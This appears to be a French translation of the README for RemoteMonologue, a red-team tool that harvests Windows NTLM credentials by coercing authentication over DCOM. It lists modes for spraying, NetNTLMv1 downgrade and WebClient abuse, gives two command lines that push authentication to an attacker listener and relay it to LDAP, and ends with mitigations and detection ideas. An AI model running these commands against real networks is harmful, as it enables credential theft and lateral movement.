
Armer DCOM pour les coercitions d'authentification NTLM
RemoteMonologue est une technique de collecte d'identifiants Windows qui permet de compromettre un utilisateur à distance en exploitant la clé RunAs de l'utilisateur interactif et en forçant des authentifications NTLM via DCOM.
Lisez l'article de X-Force Red RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions pour obtenir des informations détaillées.
🔹 Coercition d'authentification via DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) pour déclencher une authentification NTLM contre un écouteur spécifié (-auth-to).🔹 Pulvérisation d'identifiants (-spray)
🔹 Attaque de rétrogradation NetNTLMv1 (-downgrade)
🔹 Abus du service WebClient (-webclient)
🔹 Énumération des utilisateurs (-query)
Remarque : Des privilèges d'administrateur local sur le système cible sont requis.
pip install impacket
Voici un exemple d'exécution de RemoteMonologue avec l'attaque de rétrogradation NetNTLMv1 tout en utilisant Responder comme écouteur. Par défaut, si aucune option DCOM n'est spécifiée, l'outil utilise l'objet DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Voici un autre exemple, cette fois l'attaque est exécutée en utilisant l'objet DCOM FileSystemImage et en activant le service WebClient pour obtenir une authentification HTTP, qui est ensuite relayée vers LDAP à l'aide de ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Pour se protéger contre ces techniques et les détecter, plusieurs mesures préventives et de détection peuvent être mises en œuvre.
Mesures préventives :
Activer la signature LDAP et la liaison de canal : Configurez l'application de la signature LDAP et la liaison de canal sur les contrôleurs de domaine pour protéger le point de terminaison LDAP contre les attaques par relais. Remarque : Ces paramètres seront appliqués par défaut à partir de Windows Server 2025.
Mettez à niveau vers les dernières versions de Windows : Mettez à niveau les serveurs vers Windows Server 2025 et les postes de travail vers Windows 11 version 24H2 pour atténuer les attaques de rétrogradation NetNTLM, car NTLMv1 a été supprimé dans ces versions.
Appliquez la signature SMB : Activez et appliquez la signature SMB sur les serveurs Windows pour empêcher les attaques par relais SMB.
Mettez en œuvre des politiques de mots de passe forts : Appliquez des exigences de mots de passe forts pour rendre les attaques de cassage de mots de passe plus difficiles.
Opportunités de détection :
Surveillez l'accès à distance aux objets DCOM : Suivez l'accès aux objets DCOM concernés ainsi que leurs propriétés et méthodes spécifiques pour identifier une activité inhabituelle.
Surveillez les modifications du registre : Surveillez les modifications des clés de registre RunAs et LmCompatibilityLevel.
Suivez l'activité du service WebClient : Surveillez les cas où le service WebClient est activé à distance, car il est utilisé pour faciliter les authentifications NTLM basées sur HTTP.